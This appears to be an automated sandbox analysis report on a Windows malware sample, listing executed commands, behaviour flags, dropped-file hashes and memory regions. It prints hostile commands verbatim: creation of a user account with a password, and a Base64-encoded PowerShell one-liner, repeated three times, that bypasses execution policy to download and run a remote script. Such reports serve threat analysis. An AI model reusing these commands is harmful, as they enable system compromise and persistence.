C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc rbAwK2ZR3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES515C.tmpFilesize
1KB
MD51bf7c0ed04019c95717886f35d52b97b
SHA1ba667d491164ceb066403a6213f565134fbea0b3
SHA25666e87caf52b0fdfd1f971cfc5450a48f164999b0ca7c4c94db6172c2dac384e0
SHA5126196932ac6c3ced55dd3d8a6cad5c63e9cf9fefc62787f5dc51adbc49a213d405df9d989901fa10b8cf336ba1ede1d20e1002f3b44ef4fefdd19cf579bc4d6d9
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnwclm05.tuq.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1Filesize
2.5MB
MD5a9176019ae2f0af22af200ca4f842b59
SHA122c13657a4210aca116ab63d2f806906dda954fd
SHA256af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739
SHA5125171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b
-
C:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.dllFilesize
3KB
MD584a20143200a35e6cf9a70fb0a80e81a
SHA1b5e76a5afedea22dc718383ee846f8d2cf025313
SHA256d5ecb6c8a2cdbf275d822b3c062c3d124d2305d2c93d6d51f05aec98eac3528f
SHA512a4206db7fa470924664f18432fcf51e5916425546aa4a3ea1d4451232c2c23c395dd13f0e730f75a6da755dcf49ae5666836a955f3b72b3e155617044d0df515
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Windows\Branding\mediasrv.pngFilesize
60KB
MD59453615d542c9b0d521b429b9794e07d
SHA16c543926f7fcb171970bcca59a4fff36873a50a3
SHA256b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34
SHA512b6816d54bc1790107293f304d3252d84ecb92c6d2fd4b017537329be1fada98322766109c1306d71540cda3ef7936e3f2c0eabd894a9f2fc56183b1add292c34
-
C:\Windows\Branding\mediasvc.pngFilesize
743KB
MD51b1412c2f9d041ad20da79f2d5a3b130
SHA18ac8f1a8c75daf1f150f6bb103c1ccc510067758
SHA256126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f
SHA5123dbcc808c88d8098887f7a69e182d25c17aef23f3f1e7d5fc290792bb99be5a35f62169055fddf42a7082800ddd069ddfb3f2f2742d8687bab30065dc7fb74bc
-
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F13.tmpFilesize
24KB
MD5d0e162c0bd0629323ebb1ed88df890d6
SHA1cf3fd2652cdb6ff86d1df215977454390ed4d7bc
SHA2563e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744
SHA512a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\CSC3B066624B2AE420C8E6B3E287BE0BE1.TMPFilesize
652B
MD507a689eba7b80148f9ebba5fe514f4ad
SHA1d0fcf197578516471304b0f26f89bd8456d4a6ac
SHA25690e72e5e0eed8c91c768268349dad7ea3ac644e1af8b0f0ef3c705927017e79c
SHA51271da0d39e3c4cb45b7df2318343bfb39e6a3075f4e8bbdb30ee983a7d0e936ff83dc37ba70844218470d51f4dc81eeee2addfc8031108da5bb5ec381b4072c0b
-
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.0.csFilesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.cmdlineFilesize
369B
MD5b0f31b4da2441de66423fb6f99c55e5c
SHA1c4fdeb713ce1e6ccfdb88aea4d6c507106acc40b
SHA25601952217ce50ed5fda8dc599dbfb5a932d6d8a2129b4590b4c124cdbbcfde03c
SHA512a178d79d7a6d98341f5f6f4aa9cd9f46a38952c71406c27a8c335994735741efa640bb2f7ee88e001b0280820448b2ed28ac96bf2f601d16ee444117c42036de
-
memory/2044-5-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-1-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/2044-0-0x0000023676C30000-0x0000023677034000-memory.dmpFilesize
4.0MB
-
memory/2044-2-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-3-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-155-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/2044-4-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-79-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-67-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-66-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-65-0x0000023676810000-0x0000023676820000-memory.dmpFilesize
64KB
-
memory/2044-54-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/2104-38-0x00000281F7D40000-0x00000281F7EB6000-memory.dmpFilesize
1.5MB
-
memory/2104-34-0x00000281DF400000-0x00000281DF408000-memory.dmpFilesize
32KB
-
memory/2104-17-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/2104-153-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/2104-18-0x00000281DF420000-0x00000281DF442000-memory.dmpFilesize
136KB
-
memory/2104-100-0x00000281F7750000-0x00000281F7760000-memory.dmpFilesize
64KB
-
memory/2104-39-0x00000281F80D0000-0x00000281F82DA000-memory.dmpFilesize
2.0MB
-
memory/2104-152-0x00007FFE328A0000-0x00007FFE328B9000-memory.dmpFilesize
100KB
-
memory/2104-144-0x00000281F7750000-0x00000281F7760000-memory.dmpFilesize
64KB
-
memory/2104-113-0x00000281F7750000-0x00000281F7760000-memory.dmpFilesize
64KB
-
memory/2104-80-0x00007FFE328A0000-0x00007FFE328B9000-memory.dmpFilesize
100KB
-
memory/2104-37-0x00000281F7750000-0x00000281F7760000-memory.dmpFilesize
64KB
-
memory/2104-19-0x00000281F7750000-0x00000281F7760000-memory.dmpFilesize
64KB
-
memory/2104-20-0x00000281F7750000-0x00000281F7760000-memory.dmpFilesize
64KB
-
memory/2104-98-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/3168-52-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/3168-40-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/3168-41-0x000001DDC3FB0000-0x000001DDC3FC0000-memory.dmpFilesize
64KB
-
memory/3168-42-0x000001DDC3FB0000-0x000001DDC3FC0000-memory.dmpFilesize
64KB
-
memory/3920-110-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/3920-112-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmpFilesize
64KB
-
memory/3920-111-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmpFilesize
64KB
-
memory/3920-145-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmpFilesize
64KB
-
memory/3920-148-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/4580-78-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/4580-77-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/4932-64-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB
-
memory/4932-53-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmpFilesize
10.8MB